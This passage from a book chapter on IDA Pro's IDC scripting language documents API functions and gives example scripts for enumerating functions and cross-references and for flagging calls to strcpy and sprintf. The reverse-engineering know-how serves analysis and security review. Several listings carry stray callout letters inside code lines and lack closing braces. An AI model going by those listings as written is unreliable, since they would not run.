on scripting does mention something called global persistent arrays. IDC global

arrays are better thought of as persistent named objects. The objects just happen

to be sparse arrays.6 Global arrays are stored within an IDA database and are

persistent across script invocations and IDA sessions. Data is stored in global

arrays by specifying an index and a data value to be stored at the specified

index in the array. Each element in an array can simultaneously hold one

integer value and one string value. IDC’s global arrays provide no means for

storing floating point values.

NOTE For the overly curious, IDA’s internal mechanism for storing persistent arrays is called

a netnode. While the array-manipulation functions described next provide an abstracted

interface to netnodes, lower-level access to netnode data is available using the IDA

SDK, which is discussed, along with netnodes, in Chapter 16.

All interaction with global arrays occurs through the use of IDC functions

dedicated to array manipulation. Descriptions of these functions follow:

long CreateArray(string name)

This function creates a persistent object with the specified name. The

return value is an integer handle required for all future access to the

array. If the named object already exists, the return value is –1.

long GetArrayId(string name)

Once an array has been created, subsequent access to the array must be

done through an integer handle, which can be obtained by looking up

the array name. The return value for this function is an integer handle

to be used for all future interaction with the array. If the named array

does not exist, the return value is –1.

6. Sparse arrays do not necessarily preallocate space for the entire array, nor are they limited to

a particular maximum index. Instead, space for array elements is allocated on an as-needed basis

when elements are added to the array.

260 Chapter 15

long SetArrayLong(long id, long idx, long value)

Stores an integer value into the array referred to by id at the position

specified by idx. The return value is 1 on success or 0 on failure. The

operation will fail if the array id is invalid.

long SetArrayString(long id, long idx, string str)

Stores a string value into the array referred to by id at the position speci-

fied by idx. The return value is 1 on success or 0 on failure. The opera-

tion will fail if the array id is invalid.

string or long GetArrayElement(long tag, long id, long idx)

While there are distinct functions for storing data into an array depending

on the type of data to be stored, there is only one function for retrieving

data from an array. This function retrieves either an integer or a string

value from the specified index (idx) in the specified array (id). Whether

an integer or a string is retrieved is determined by the value of the tag

parameter, which must be one of the constants AR_LONG (to retrieve an

integer) or AR_STR (to retrieve a string).

long DelArrayElement(long tag, long id, long idx)

Deletes the contents of the specified array location from the specified

array. The value of tag determines whether the integer value or string

value associated with the specified index is deleted.

void DeleteArray(long id)

Deletes the array referenced by id and all of its associated contents. Once

an array has been created, it continues to exist, even after a script termi-

nates, until a call is made to DeleteArray to remove the array from the

database in which it was created.

long RenameArray(long id, string newname)

Renames the array referenced by id to newname. Returns 1 if successful or

0 if the operation fails.

Possible uses for global arrays include approximating global variables,

approximating complex datatypes, and providing persistent storage across

script invocations. Global variables for a script are simulated by creating a

global array when the script begins and storing global values in the array.

These global values are shared either by passing the array handle to func-

tions requiring access to the values or by requiring any function that requires

access to perform a name lookup for the desired array.

Values stored in an IDC global array persist for the lifetime of the data-

base in which the script was executed. You may test for the existence of an

array by examining the return value of the CreateArray function. If the values

stored in an array are applicable only to a specific invocation of a script, then

the array should be deleted before the script terminates. Deleting the array

ensures that no global values carry over from one execution of a script to a

subsequent execution of the same script.

IDA Scripting 261

Associating IDC Scripts with Hotkeys

Occasionally you may develop a script so amazing in its utility that you must

have access to it with a keystroke or two. When this happens, you will want to

assign a hotkey sequence that you can use to quickly activate your script. For-

tunately IDA provides a simple means to do this. Every time IDA is launched,

the script contained in <IDADIR>/idc/ida.idc is executed. The default version

of this script contains an empty main function and thus does nothing. To asso-

ciate a hotkey with one of your scripts, you need to add two lines to ida.idc.

The first line you must add is an include directive to include your script file

in ida.idc. The second line you must add is a call, within main, to the AddHotkey

function to associate a specific hotkey with your amazing IDC function. This

might leave ida.idc looking like this:

#include <idc.idc>

#include <my_amazing_script.idc>

static main() {

AddHotkey("z", "MyAmazingFunc"); //Now 'z' invokes MyAmazingFunc

}

If the hotkey you are attempting to associate with your script has already

been assigned to another IDA action (menu hotkey or plug-in activation

sequence), AddHotkey silently fails with no way to detect the failure other

than the fact that your function fails to execute when your hotkey sequence

is activated.

Two important points here are that the standard include directory for

IDC scripts is <IDADIR>/idc and that you must not name your script function

main. If you want IDA to find your script easily, you can copy it into <IDADIR>/

idc. If you intend to leave your script file in another location, then you will

need to specify the full path to your script in the include statement. While

testing your script, it will be useful to run your script as a standalone program

with a main function. Once you are ready to associate your script with a hot-

key, however, you cannot use the name main, because it will conflict with the

main function in ida.idc. You must rename your main function and use the new

name in the call to AddHotkey.

Useful IDC Functions

At this point, you have all the information required to write well-formed IDC

scripts. What you are lacking is the ability to perform any useful interaction

with IDA itself. IDC provides a long list of built-in functions that offer many

different ways to access a database. All of the functions are documented to

some degree in the IDA help system under the topic Index of IDC functions.

In most cases, the documentation is nothing more than relevant lines copied

from the main IDC include file, idc.idc. Becoming comfortable with the rather

terse documentation is one of the more frustrating aspects of learning IDC.

In general, there is no easy way to answer the question “How do I do x in

IDC?” The most common way to figure out how to do something is to browse

262 Chapter 15

the list of IDC functions looking for one that, based on its name, appears to

do what you need. This presumes, of course, that the functions are named

according to their purpose, but their purpose may not always be obvious. For

example, in many cases, functions that retrieve information from the data-

base are named GetXXX; however; in many other cases, the Get prefix is not used.

Functions that change the database may be named SetXXX, MakeXXX, or some-

thing else entirely. In summary, if you want to use IDC, get used to browsing

the list of functions and reading through their descriptions. If you find your-

self at a complete loss, don’t be afraid to use the support forums at Hex-Rays.7

The intent of the remainder of this section is to point out some of the

more useful (in our experience) IDC functions and group them into func-

tional areas. Even if you intend to script in Python only, familiarity with the

listed functions will be useful to you because IDAPython provides Python

equivalents to each function listed here. We make no attempt to cover every

IDC function, however, since they are already covered in the IDA help system.

Functions for Reading and Modifying Data

The following functions provide access to individual bytes, words, and double

words in a database:

long Byte(long addr)

Reads a byte value from virtual address addr.

long Word(long addr)

Reads a word (2-byte) value from virtual address addr.

long Dword(long addr)

Reads a double word (4-byte) value from virtual address addr.

void PatchByte(long addr, long val)

Sets a byte value at virtual address addr.

void PatchWord(long addr, long val)

Sets a word value at virtual address addr.

void PatchDword(long addr, long val)

Sets a double word value at virtual address addr.

bool isLoaded(long addr)

Returns 1 if addr contains valid data, 0 otherwise.

Each of these functions takes the byte ordering (little-endian or big-

endian) of the current processor module into account when reading and

writing the database. The PatchXXX functions also trim the supplied value

to an appropriate size by using only the proper number of low-order bytes

according to the function called. For example, a call to PatchByte(0x401010,

0x1234) will patch location 0x401010 with the byte value 0x34 (the low-order

byte of 0x1234). If an invalid address is supplied while reading the database

with Byte, Word, and Dword, the values 0xFF, 0xFFFF, and 0xFFFFFFFF will be

returned, respectively. Because there is no way to distinguish these error

7. The support forum is currently located at http://www.hex-rays.com/forum/.

IDA Scripting 263

values from legitimate data stored in the database, you may wish to call

isLoaded to determine whether an address in the database contains any

data prior to attempting to read from that address.

Because of a quirk in refreshing IDA’s disassembly view, you may find

that the results of a patch operation are not immediately visible. In such

cases, scrolling away from the patched location and then scrolling back to

the patched location generally forces the display to be updated properly.

User Interaction Functions

In order to perform any user interaction at all, you will need to familiarize

yourself with IDC input/output functions. The following list summarizes

some of IDC’s more useful interface functions:

void Message(string format, ...)

Prints a formatted message to the output window. This function is analo-

gous to C’s printf function and accepts a printf-style format string.

void print(...)

Prints the string representation of each argument to the output window.

void Warning(string format, ...)

Displays a formatted message in a dialog.

string AskStr(string default, string prompt)

Displays an input dialog asking the user to enter a string value. Returns

the user’s string or 0 if the dialog was canceled.

string AskFile(long doSave, string mask, string prompt)

Displays a file-selection dialog to simplify the task of choosing a file. New

files may be created for saving data (doSave = 1), or existing files may be

chosen for reading data (doSave = 0). The displayed list of files may be fil-

tered according to mask (such as *.* or *.idc). Returns the name of the

selected file or 0 if the dialog was canceled.

long AskYN(long default, string prompt)

Prompts the user with a yes or no question, highlighting a default answer

(1 = yes, 0 = no, –1 = cancel). Returns an integer representing the selected

answer.

long ScreenEA()

Returns the virtual address of the current cursor location.

bool Jump(long addr)

Jumps the disassembly window to the specified address.

Because IDC lacks any debugging facilities, you may find yourself using

the Message function as your primary debugging tool. Several other AskXXX

functions exist to handle more specialized input cases such as integer input.

Please refer to the help system documentation for a complete list of available

AskXXX functions. The ScreenEA function is very useful for picking up the cur-

rent cursor location when you wish to create a script that tailors its behavior

264 Chapter 15

based on the location of the cursor. Similarly, the Jump function is useful

when you have a script that needs to call the user’s attention to a specific

location within the disassembly.

String-Manipulation Functions

Although simple string assignment and concatenation are taken care of with

basic operators in IDC, more complex operations must be performed using

available string-handling functions, some of which are detailed here:

string form(string format, ...) // pre IDA 5.6

Returns a new string formatted according to the supplied format strings

and values. This is the rough equivalent to C’s sprintf function.

string sprintf(string format, ...) // IDA 5.6+

With IDA 5.6, sprintf replaces form (see above).

long atol(string val)

Converts the decimal value val to its corresponding integer representation.

long xtol(string val)

Converts the hexadecimal value val (which may optionally begin with 0x)

to its corresponding integer representation.

string ltoa(long val, long radix)

Returns a string representation of val in the specified radix (2, 8, 10,

or 16).

long ord(string ch)

Returns the ASCII value of the one-character string ch.

long strlen(string str)

Returns the length of the provided string.

long strstr(string str, string substr)

Returns the index of substr within str or –1 if the substring is not found.

string substr(string str, long start, long end)

Returns the substring containing the characters from start through end-1

of str. Using slices (IDA 5.6+) this function is equivalent to str[start:end].

Recall that there is no character datatype in IDC, nor is there any array

syntax. Lacking slices, if you want to iterate through the individual characters

within a string, you must take successive one-character substrings for each

character in the string.

File Input/Output Functions

The output window may not always be the ideal place to send the output of

your scripts. For scripts that generate a large amount of text or scripts that

generate binary data, you may wish to output to disk files instead. We have

IDA Scripting 265

already discussed using the AskFile function to ask a user for a filename.

However, AskFile returns only a string containing the name of a file. IDC’s

file-handling functions are detailed here:

long fopen(string filename, string mode)

Returns an integer file handle (or 0 on error) for use with all IDC file

I/O functions. The mode parameter is similar to the modes used in C’s

fopen (r to read, w to write, and so on).

void fclose(long handle)

Closes the file specified by the file handle from fopen.

long filelength(long handle)

Returns the length of the indicated file or –1 on error.

long fgetc(long handle)

Reads a single byte from the given file. Returns –1 on error.

long fputc(long val, long handle)

Writes a single byte to the given file. Returns 0 on success or –1 on error.

long fprintf(long handle, string format, ...)

Writes a formatted string to the given file.

long writestr(long handle, string str)

Writes the specified string to the given file.

string/long readstr(long handle)

Reads a string from the given file. This function reads all characters

(including non-ASCII) up to and including the next line feed (ASCII

0xA) character. Returns the string on success or –1 on end of file.

long writelong(long handle, long val, long bigendian)

Writes a 4-byte integer to the given file using big-endian (bigendian = 1)

or little-endian (bigendian = 0) byte order.

long readlong(long handle, long bigendian)

Reads a 4-byte integer from the given file using big-endian (bigendian = 1)

or little-endian (bigendian = 0) byte order.

long writeshort(long handle, long val, long bigendian)

Writes a 2-byte integer to the given file using big-endian (bigendian = 1)

or little-endian (bigendian = 0) byte order.

long readshort(long handle, long bigendian)

Reads a 2-byte integer from the given file using big-endian (bigendian = 1)

or little-endian (bigendian = 0) byte order.

bool loadfile(long handle, long pos, long addr, long length)

Reads length number of bytes from position pos in the given file and

writes those bytes into the database beginning at address addr.

bool savefile(long handle, long pos, long addr, long length)

Writes length number of bytes beginning at database address addr to posi-

tion pos in the given file.

266 Chapter 15

Manipulating Database Names

The need to manipulate named locations arises fairly often in scripts. The

following IDC functions are available for working with named locations in an

IDA database:

string Name(long addr)

Returns the name associated with the given address or returns the empty

string if the location has no name. This function does not return user-

assigned names when the names are marked as local.

string NameEx(long from, long addr)

Returns the name associated with addr. Returns the empty string if the

location has no name. This function returns user-defined local names if

from is any address within a function that also contains addr.

bool MakeNameEx(long addr, string name, long flags)

Assigns the given name to the given address. The name is created with

attributes specified in the flags bitmask. These flags are described in the

help file documentation for MakeNameEx and are used to specify attributes

such as whether the name is local or public or whether it should be listed

in the names window.

long LocByName(string name)

Returns the address of the location with the given name. Returns

BADADDR (–1) if no such name exists in the database.

long LocByNameEx(long funcaddr, string localname)

Searches for the given local name within the function containing

funcaddr. Returns BADADDR (–1) if no such name exists in the

given function.

Functions Dealing with Functions

Many scripts are designed to perform analysis of functions within a database.

IDA assigns disassembled functions a number of attributes, such as the size

of the function’s local variable area or the size of the function’s arguments

on the runtime stack. The following IDC functions can be used to access

information about functions within a database.

long GetFunctionAttr(long addr, long attrib)

Returns the requested attribute for the function containing the given

address. Refer to the IDC help documentation for a list of attribute

constants. As an example, to find the ending address of a function, use

GetFunctionAttr(addr, FUNCATTR_END);.

string GetFunctionName(long addr)

Returns the name of the function that contains the given address or an

empty string if the given address does not belong to a function.

long NextFunction(long addr)

Returns the starting address of the next function following the given

address. Returns –1 if there are no more functions in the database.

IDA Scripting 267

long PrevFunction(long addr)

Returns the starting address of the nearest function that precedes the

given address. Returns –1 if no function precedes the given address.

Use the LocByName function to find the starting address of a function given

the function’s name.

Code Cross-Reference Functions

Cross-references were covered in Chapter 9. IDC offers functions for access-

ing cross-reference information associated with any instruction. Deciding

which functions meet the needs of your scripts can be a bit confusing. It

requires you to understand whether you are interested in following the

flows leaving a given address or whether you are interested in iterating over

all of the locations that refer to a given address. Functions for performing

both of the preceding operations are described here. Several of these func-

tions are designed to support iteration over a set of cross-references. Such

functions support the notion of a sequence of cross-references and require

acurrent cross-reference in order to return a next cross-reference. Examples

of using cross-reference iterators are provided in “Enumerating Cross-

References” on page 272.

long Rfirst(long from)

Returns the first location to which the given address transfers control. Re-

turns BADADDR (–1) if the given address refers to no other address.

long Rnext(long from, long current)

Returns the next location to which the given address (from) transfers

control, given that current has already been returned by a previous call

to Rfirst or Rnext. Returns BADADDR if no more cross-references exist.

long XrefType()

Returns a constant indicating the type of the last cross-reference returned

by a cross-reference lookup function such as Rfirst. For code cross-

references, these constants are fl_CN (near call), fl_CF (far call), fl_JN

(near jump), fl_JF (far jump), and fl_F (ordinary sequential flow).

long RfirstB(long to)

Returns the first location that transfers control to the given address. Re-

turns BADADDR (–1) if there are no references to the given address.

long RnextB(long to, long current)

Returns the next location that transfers control to the given address (to),

given that current has already been returned by a previous call to RfirstB

or RnextB. Returns BADADDR if no more cross-references to the given

location exist.

Each time a cross-reference function is called, an internal IDC state vari-

able is set that indicates the type of the last cross-reference that was returned.

If you need to know what type of cross-reference you have received, then you

must call XrefType prior to calling another cross-reference lookup function.

268 Chapter 15

Data Cross-Reference Functions

The functions for accessing data cross-reference information are very similar

to the functions used to access code cross-reference information. These func-

tions are described here:

long Dfirst(long from)

Returns the first location to which the given address refers to a data

value. Returns BADADDR (–1) if the given address refers to no other

addresses.

long Dnext(long from, long current)

Returns the next location to which the given address (from) refers a data

value, given that current has already been returned by a previous call to

Dfirst or Dnext. Returns BADADDR if no more cross-references exist.

long XrefType()

Returns a constant indicating the type of the last cross-reference returned

by a cross-reference lookup function such as Dfirst. For data cross-

references, these constants include dr_O (offset taken), dr_W (data write),

and dr_R (data read).

long DfirstB(long to)

Returns the first location that refers to the given address as data. Returns

BADADDR (–1) if there are no references to the given address.

long DnextB(long to, long current)

Returns the next location that refers to the given address (to) as data,

given that current has already been returned by a previous call to DfirstB

or DnextB. Returns BADADDR if no more cross-references to the given

location exist.

As with code cross-references, if you need to know what type of cross-

reference you have received, then you must call XrefType prior to calling

another cross-reference lookup function.

Database Manipulation Functions

A number of functions exist for formatting the contents of a database. Here

are descriptions of a few of these functions:

void MakeUnkn(long addr, long flags)

Undefines the item at the specified address. The flags (see the IDC docu-

mentation for MakeUnkn) dictate whether subsequent items will also be

undefined and whether any names associated with undefined items will

be deleted. Related function MakeUnknown allows you to undefine large

blocks of data.

long MakeCode(long addr)

Converts the bytes at the specified address into an instruction. Returns

the length of the instruction or 0 if the operation fails.

IDA Scripting 269

bool MakeByte(long addr)

Converts the item at the specified address into a data byte. MakeWord and

MakeDword are also available.

bool MakeComm(long addr, string comment)

Adds a regular comment at the given address.

bool MakeFunction(long begin, long end)

Converts the range of instructions from begin to end into a function. If end

is specified as BADADDR (-1), IDA attempts to automatically identify the

end of the function by locating the function’s return instruction.

bool MakeStr(long begin, long end)

Creates a string of the current string type (as returned by GetStringType),

spanning the bytes from begin to end - 1. If end is specified as BADADDR, IDA

attempts to automatically identify the end of the string.

Many other MakeXXX functions exist that offer behavior similar to the func-

tions just described. Please refer to the IDC documentation for a full list of

these functions.

Database Search Functions

The majority of IDA’s search capabilities are accessible in IDC in the form

of various FindXXX functions, some of which are described here. The flags

parameter used in the FindXXX functions is a bitmask that specifies the behav-

ior of the find operation. Three of the more useful flags are SEARCH_DOWN,

which causes the search to scan toward higher addresses; SEARCH_NEXT, which

skips the current occurrence in order to search for the next occurrence; and

SEARCH_CASE, which causes binary and text searches to be performed in a case-

sensitive manner.

long FindCode(long addr, long flags)

Searches for an instruction from the given address.

long FindData(long addr, long flags)

Searches for a data item from the given address.

long FindBinary(long addr, long flags, string binary)

Searches for a sequence of bytes from the given address. The binary

string specifies a sequence of hexadecimal byte values. If SEARCH_CASE is

not specified and a byte value specifies an uppercase or lowercase ASCII

letter, then the search will also match corresponding, complementary

case values. For example, “41 42” will match “61 62” (and “61 42”) unless

the SEARCH_CASE flag is set.

long FindText(long addr, long flags, long row, long column, string text)

Searches for a text string from the given column on the given line (row) at

the given address. Note that the disassembly text at a given address may

span several lines, hence the need to specify on which line the search

should begin.

270 Chapter 15

Also note that SEARCH_NEXT does not define the direction of search, which

may be either up or down according to the SEARCH_DOWN flag. In addition,

when SEARCH_NEXT is not specified, it is perfectly reasonable for a FindXXX func-

tion to return the same address that was passed in as the addr argument when

the item at addr satisfies the search.

Disassembly Line Components

From time to time it is useful to extract the text, or portions of the text,

of individual lines in a disassembly listing. The following functions provide

access to various components of a disassembly line:

string GetDisasm(long addr)

Returns disassembly text for the given address. The returned text

includes any comments but does not include address information.

string GetMnem(long addr)

Returns the mnemonic portion of the instruction at the given address.

string GetOpnd(long addr, long opnum)

Returns the text representation of the specified operand at the specified

address. Operands are numbered from zero beginning with the leftmost

operand.

long GetOpType(long addr, long opnum)

Returns an integer representing the type for the given operand at the

given address. Refer to the IDC documentation for GetOpType for a com-

plete list of operand type codes.

long GetOperandValue(long addr, long opnum)

Returns the integer value associated with the given operand at the given

address. The nature of the returned value depends on the type of the

given operand as specified by GetOpType.

string CommentEx(long addr, long type)

Returns the text of any comment present at the given address. If type is 0,

the text of the regular comment is returned. If type is 1, the text of the

repeatable comment is returned. If no comment is present at the given

address, an empty string is returned.

IDC Scripting Examples

At this point it is probably useful to see some examples of scripts that per-

form specific tasks. For the remainder of the chapter we present some fairly

common situations in which a script can be used to answer a question about

a database.

Enumerating Functions

Many scripts operate on individual functions. Examples include generating

the call tree rooted at a specific function, generating the control flow graph

of a function, or analyzing the stack frames of every function in a database.

IDA Scripting 271

Listing 15-1 iterates through every function in a database and prints basic

information about each function, including the start and end addresses of

the function, the size of the function’s arguments, and the size of the func-

tion’s local variables. All output is sent to the output window.

#include <idc.idc>

static main() {

auto addr, end, args, locals, frame, firstArg, name, ret;

addr = 0;

for (addr = NextFunction(addr); addr != BADADDR; addr = NextFunction(addr)) {

name = Name(addr);

end = GetFunctionAttr(addr, FUNCATTR_END);

locals = GetFunctionAttr(addr, FUNCATTR_FRSIZE);

frame = GetFrame(addr); // retrieve a handle to the function’s stack frame

ret = GetMemberOffset(frame, " r"); // " r" is the name of the return address

if (ret == -1) continue;

firstArg = ret + 4;

args = GetStrucSize(frame) - firstArg;

Message("Function: %s, starts at %x, ends at %x\n", name, addr, end);

Message(" Local variable area is %d bytes\n", locals);

Message(" Arguments occupy %d bytes (%d args)\n", args, args / 4);

}

Listing 15-1: Function enumeration script

This script uses some of IDC’s structure-manipulation functions to

obtain a handle to each function’s stack frame (GetFrame), determine the

size of the stack frame (GetStrucSize), and determine the offset of the saved

return address within the frame (GetMemberOffset). The first argument to

the function lies 4 bytes beyond the saved return address. The size of the

function’s argument area is computed as the space between the first argu-

ment and the end of the stack frame. Since IDA can’t generate stack frames

for imported functions, this script tests whether the function’s stack frame

contains a saved return address as a simple means of identifying calls to an

imported function.

Enumerating Instructions

Within a given function, you may want to enumerate every instruction. List-

ing 15-2 counts the number of instructions contained in the function identi-

fied by the current cursor position:

#include <idc.idc>

static main() {

auto func, end, count, inst;

X func = GetFunctionAttr(ScreenEA(), FUNCATTR_START);

if (func != -1) {

Y end = GetFunctionAttr(func, FUNCATTR_END);

count = 0;

inst = func;

while (inst < end) {

272 Chapter 15

count++;

Z inst = FindCode(inst, SEARCH_DOWN | SEARCH_NEXT);

}

Warning("%s contains %d instructions\n", Name(func), count);

}

else {

Warning("No function found at location %x", ScreenEA());

}

Listing 15-2: Instruction enumeration script

The function begins X by using GetFunctionAttr to determine the start

address of the function containing the cursor address (ScreenEA()). If the

beginning of a function is found, the next step Y is to determine the end

address for the function, once again using the GetFunctionAttr function.

Once the function has been bounded, a loop is executed to step through

successive instructions in the function by using the search functionality of

the FindCode function Z. In this example, the Warning function is used to dis-

play results, since only a single line of output will be generated by the func-

tion and output displayed in a Warning dialog is much more obvious than

output generated in the message window. Note that this example assumes

that all of the instructions within the given function are contiguous. An alter-

native approach might replace the use of FindCode with logic to iterate over

all of the code cross-references for each instruction within the function.

Properly written, this second approach would handle noncontiguous, also

known as “chunked,” functions.

Enumerating Cross-References

Iterating through cross-references can be confusing because of the number

of functions available for accessing cross-reference data and the fact that

code cross-references are bidirectional. In order to get the data you want,

you need to make sure you are accessing the proper type of cross-reference

for your situation. In our first cross-reference example, shown in Listing 15-3,

we derive the list of all function calls made within a function by iterating

through each instruction in the function to determine if the instruction calls

another function. One method of doing this might be to parse the results of

GetMnem to look for call instructions. This would not be a very portable solu-

tion, because the instruction used to call a function varies among CPU types.

Second, additional parsing would be required to determine exactly which

function was being called. Cross-references avoid each of these difficulties

because they are CPU-independent and directly inform us about the target

of the cross-reference.

#include <idc.idc>

static main() {

auto func, end, target, inst, name, flags, xref;

flags = SEARCH_DOWN | SEARCH_NEXT;

func = GetFunctionAttr(ScreenEA(), FUNCATTR_START);

IDA Scripting 273

if (func != -1) {

name = Name(func);

end = GetFunctionAttr(func, FUNCATTR_END);

for (inst = func; inst < end; inst = FindCode(inst, flags)) {

for (target = Rfirst(inst); target != BADADDR; target = Rnext(inst, target)) {

xref = XrefType();

if (xref == fl_CN || xref == fl_CF) {

Message("%s calls %s from 0x%x\n", name, Name(target), inst);

}

else {

Warning("No function found at location %x", ScreenEA());

}

Listing 15-3: Enumerating function calls

In this example, we must iterate through each instruction in the func-

tion. For each instruction, we must then iterate through each cross-reference

from the instruction. We are interested only in cross-references that call other

functions, so we must test the return value of XrefType looking for fl_CN or

fl_CF-type cross-references. Here again, this particular solution handles only

functions whose instructions happen to be contiguous. Given that the script

is already iterating over the cross-references from each instruction, it would

not take many changes to produce a flow-driven analysis instead of the

address-driven analysis seen here.

Another use for cross-references is to determine every location that refer-

ences a particular location. For example, if we wanted to create a low-budget

security analyzer, we might be interested in highlighting all calls to functions

such as strcpy and sprintf.

DANGEROUS FUNCTIONS

The C functions strcpy and sprintf are generally acknowledged as dangerous

to use because they allow for unbounded copying into destination buffers. While

each may be safely used by programmers who conduct proper checks on the size

of source and destination buffers, such checks are all too often forgotten by program-

mers unaware of the dangers of these functions. The strcpy function, for example, is

declared as follows:

char *strcpy(char *dest, const char *source);

The strcpy function’s defined behavior is to copy all characters up to and includ-

ing the first null termination character encountered in the source buffer to the given

destination buffer (dest). The fundamental problem is that there is no way to deter-

mine, at runtime, the size of any array. In this instance, strcpy has no means to

determine whether the capacity of the destination buffer is sufficient to hold all of the

data to be copied from source. Such unchecked copy operations are a major cause

of buffer overflow vulnerabilities.

274 Chapter 15

In the example shown in Listing 15-4, we work in reverse to iterate across

all of the cross-references to (as opposed to from in the preceding example) a

particular symbol:

#include <idc.idc>

static list_callers(bad_func) {

auto func, addr, xref, source;

X func = LocByName(bad_func);

if (func == BADADDR) {

Warning("Sorry, %s not found in database", bad_func);

}

else {

Y for (addr = RfirstB(func); addr != BADADDR; addr = RnextB(func, addr)) {

Z xref = XrefType();

[ if (xref == fl_CN || xref == fl_CF) {

\ source = GetFunctionName(addr);

] Message("%s is called from 0x%x in %s\n", bad_func, addr, source);

}

static main() {

list_callers("_strcpy");

list_callers("_sprintf");

}

Listing 15-4: Enumerating a function’s callers

In this example, the LocByName X function is used to find the address of a

given (by name) bad function. If the function’s address is found, a loop Y is

executed in order to process all cross-references to the bad function. For each

cross-reference, if the cross-reference type Z is determined to be a call-type

[ cross-reference, the calling function’s name is determined \ and is dis-

played to the user ].

It is important to note that some modifications may be required to per-

form a proper lookup of the name of an imported function. In ELF executa-

bles in particular, which combine a procedure linkage table (PLT) with a

global offset table (GOT) to handle the details of linking to shared libraries,

the names that IDA assigns to imported functions may be less than clear. For

example, a PLT entry may appear to be named _memcpy, when in fact it is

named .memcpy and IDA has replaced the dot with an underscore because

IDA considers dots invalid characters within names. Further complicating

matters is the fact that IDA may actually create a symbol named memcpy that

resides in a section that IDA names extern. When attempting to enumerate

cross-references to memcpy, we are interested in the PLT version of the symbol

because this is the version that is called from other functions in the program

and thus the version to which all cross-references would refer.

IDA Scripting 275

Enumerating Exported Functions

In Chapter 13 we discussed the use of idsutils to generate .ids files that

describe the contents of shared libraries. Recall that the first step in generat-

ing a .ids file involves generating a .idt file, which is a text file containing

descriptions of each exported function contained in the library. IDC con-

tains functions for iterating through the functions that are exported by a

shared library. The script shown in Listing 15-5 can be run to generate an

.idt file after opening a shared library with IDA:

#include <idc.idc>

static main() {

auto entryPoints, i, ord, addr, name, purged, file, fd;

file = AskFile(1, "*.idt", "Select IDT save file");

fd = fopen(file, "w");

entryPoints = GetEntryPointQty();

fprintf(fd, "ALIGNMENT 4\n");

fprintf(fd, "0 Name=%s\n", GetInputFile());

for (i = 0; i < entryPoints; i++) {

ord = GetEntryOrdinal(i);

if (ord == 0) continue;

addr = GetEntryPoint(ord);

if (ord == addr) {

continue; //entry point has no ordinal

}

name = Name(addr);

fprintf(fd, "%d Name=%s", ord, name);

purged = GetFunctionAttr(addr, FUNCATTR_ARGSIZE);

if (purged > 0) {

fprintf(fd, " Pascal=%d", purged);

}

fprintf(fd, "\n");

}

Listing 15-5: A script to generate .idt files

The output of the script is saved to a file chosen by the user. New func-

tions introduced in this script include GetEntryPointQty, which returns the

number of symbols exported by the library; GetEntryOrdinal, which returns

an ordinal number (an index into the library’s export table); GetEntryPoint,

which returns the address associated with an exported function that has been

identified by ordinal number; and GetInputFile, which returns the name of

the file that was loaded into IDA.

Finding and Labeling Function Arguments

Versions of GCC later than 3.4 use mov statements rather than push statements

in x86 binaries to place function arguments into the stack before calling a

function. Occasionally this causes some analysis problems for IDA (newer

versions of IDA handle this situation better), because the analysis engine

276 Chapter 15

relies on finding push statements to pinpoint locations at which arguments

are pushed for a function call. The following listing shows an IDA disassem-

bly when parameters are pushed onto the stack:

.text:08048894 push 0 ; protocol

.text:08048896 push 1 ; type

.text:08048898 push 2 ; domain

.text:0804889A call _socket

Note the comments that IDA has placed in the right margin. Such com-

menting is possible only when IDA recognizes that parameters are being

pushed and when IDA knows the signature of the function being called.

When mov statements are used to place parameters onto the stack, the

resulting disassembly is somewhat less informative, as shown here:

.text:080487AD mov [esp+8], 0

.text:080487B5 mov [esp+4], 1

.text:080487BD mov [esp], 2

.text:080487C4 call _socket

In this case, IDA has failed to recognize that the three mov statements pre-

ceding the call are being used to set up the parameters for the function call.

As a result, we get less assistance from IDA in the form of automatic comments

in the disassembly.

Here we have a situation where a script might be able to restore some of

the information that we are accustomed to seeing in our disassemblies. List-

ing 15-6 is a first effort at automatically recognizing instructions that are set-

ting up parameters for function calls:

#include <idc.idc>

static main() {

auto addr, op, end, idx;

auto func_flags, type, val, search;

search = SEARCH_DOWN | SEARCH_NEXT;

addr = GetFunctionAttr(ScreenEA(), FUNCATTR_START);

func_flags = GetFunctionFlags(addr);

if (func_flags & FUNC_FRAME) { //Is this an ebp-based frame?

end = GetFunctionAttr(addr, FUNCATTR_END);

for (; addr < end && addr != BADADDR; addr = FindCode(addr, search)) {

type = GetOpType(addr, 0);

if (type == 3) { //Is this a register indirect operand?

if (GetOperandValue(addr, 0) == 4) { //Is the register esp?

MakeComm(addr, "arg_0"); //[esp] equates to arg_0

}

IDA Scripting 277

else if (type == 4) { //Is this a register + displacement operand?

idx = strstr(GetOpnd(addr, 0), "[esp"); //Is the register esp?

if (idx != -1) {

val = GetOperandValue(addr, 0); //get the displacement

MakeComm(addr, form("arg_%d", val)); //add a comment

}

Listing 15-6: Automating parameter recognition

The script works only on EBP-based frames and relies on the fact that

when parameters are moved into the stack prior to a function call, GCC

generates memory references relative to esp. The script iterates through all

instructions in a function; for each instruction that writes to a memory loca-

tion using esp as a base register, the script determines the depth within the

stack and adds a comment indicating which parameter is being moved. The

GetFunctionFlags function offers access to various flags associated with a func-

tion, such as whether the function uses an EBP-based stack frame. Running

the script in Listing 15-6 yields the annotated disassembly shown here:

.text:080487AD mov [esp+8], 0 ; arg_8

.text:080487B5 mov [esp+4], 1 ; arg_4

.text:080487BD mov [esp], 2 ; arg_0

.text:080487C4 call _socket

The comments aren’t particularly informative. However, we can now tell

at a glance that the three mov statements are used to place parameters onto

the stack, which is a step in the right direction. By extending the script a bit

further and exploring some more of IDC’s capabilities, we can come up with

a script that provides almost as much information as IDA does when it prop-

erly recognizes parameters. The output of the final product is shown here:

.text:080487AD mov [esp+8], 0 ; int protocol

.text:080487B5 mov [esp+4], 1 ; int type

.text:080487BD mov [esp], 2 ; int domain

.text:080487C4 call _socket

The extended version of the script in Listing 15-6, which is capable of

incorporating data from function signatures into comments, is available on

this book’s website.8

8. See http://www.idabook.com/ch15_examples.

278 Chapter 15

Emulating Assembly Language Behavior

There are a number of reasons why you might need to write a script that

emulates the behavior of a program you are analyzing. For example, the pro-

gram you are studying may be self-modifying, as many malware programs are,

or the program may contain some encoded data that gets decoded when it

is needed at runtime. Without running the program and pulling the modi-

fied data out of the running process’s memory, how can you understand

the behavior of the program? The answer may lie with an IDC script. If the

decoding process is not terribly complex, you may be able to quickly write

an IDC script that performs the same actions that are performed by the

program when it runs. Using a script to decode data in this way eliminates

the need to run a program when you don’t know what the program does or

you don’t have access to a platform on which you can run the program. An

example of the latter case might occur if you were examining a MIPS binary

